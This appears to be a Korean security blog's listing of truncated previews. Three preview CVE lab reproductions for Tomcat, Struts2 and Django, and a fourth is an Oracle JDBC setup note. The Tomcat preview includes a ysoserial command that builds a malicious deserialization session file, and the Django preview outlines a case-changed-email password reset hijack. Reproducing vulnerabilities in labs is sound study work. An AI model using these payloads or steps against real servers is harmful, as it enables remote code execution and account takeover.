CVE-2020-9484 0. 취약한 환경 버전 Apache Tomcat 7.0.0 ~ 7.0.103 8.5.0 ~ 8.5.54 9.0.0.M1 ~ 9.0.34 10.0.0-M1 ~ 10.0.0-M4 1. 환경 구성 1. ubuntu 20.04 2. docker 3. ysoserial CommonsCollections2 가젯 체인을 이용하여 공격 코드가 포함된 세션 파일 생성 ( docker 파일 내 첨부되어 따로 실행하지 않아도 됨) java -jar ./ysoserial-master.jar CommonsCollections2 'tocuh /tmp/rce' > groovy.session ysoserial: https://github.com/frohoff/ysoserial GitHub - frohoff/..
CVE-2018-11776 0. 취약한 환경 버전 Apache Struts2 2.3 ~ 2.3.34 , 2.5 ~ 2.5.16 버전 1. 환경 구성 mac os docker 도커 이미지 다운로드 $ docker pull piesecurity/apache-struts2-cve-2017-5638 도커 컨테이너는 8080 포트, 호스트 시스템은 32771 포트를 사용 $ docker run -d --name struts2 -p 32771:8080 piesecurity/apache-struts2-cve-2017-5638 도커 내부 및 설정 파일 접근 $ docker exec -t -i struts2 /bin/bash $ apt-get update $ apt-get install vim $ vim /usr/loc..
CVE-2019-19844 0. 취약한 환경 버전 Django 3.0 1. 환경 구성 python 3.8.10 Ubuntu 20.04.1 Django 3.0 postgreSQL 12.8 POC를 위한 계정 정보 추가 (SHELL) from django.contrib.auth import get_user_model User = get_user_model() User.objects.create_user('testuser', 'test@abc.com', 'test123') 2. POC test@abc.com -> Test@abc.com (대소문자 변경) 후 패스워드 리셋 이메일 인증을 진행한다 Test@abc.com 이메일로 패스워드 리셋 URL이 전송 된것을 확인 할 수 있다. 3. 상세분석 2가지 취약성으..
오라클 접속 $sqlplus '/as sysdba' 오라클 SID 확인 SQL> select instance from v$thread; 오라클 데이터베이스 확인 SQL> select name, db_unique_name from v$database; Tomcat + oracle DB 연동 (중요: DB서버가 아닌 웹서버에서 작업) 웹서버에서 오라클 jdbc 찾기 find / | grep ojdbc cd /u01/app/oracle/product/11.2.0/xe/jdbc/lib && ll 주의: 웹서버에 ojbdc가 없는 경우 DB서버에 있는 ojdbc를 웹서버로 옮겨줘야한다 오라클 드라이버 복사 cp ojdbc6.jar 톰캣 경로/lib cp ojdbc6.jar jdk 경로/lib Tomcat + or..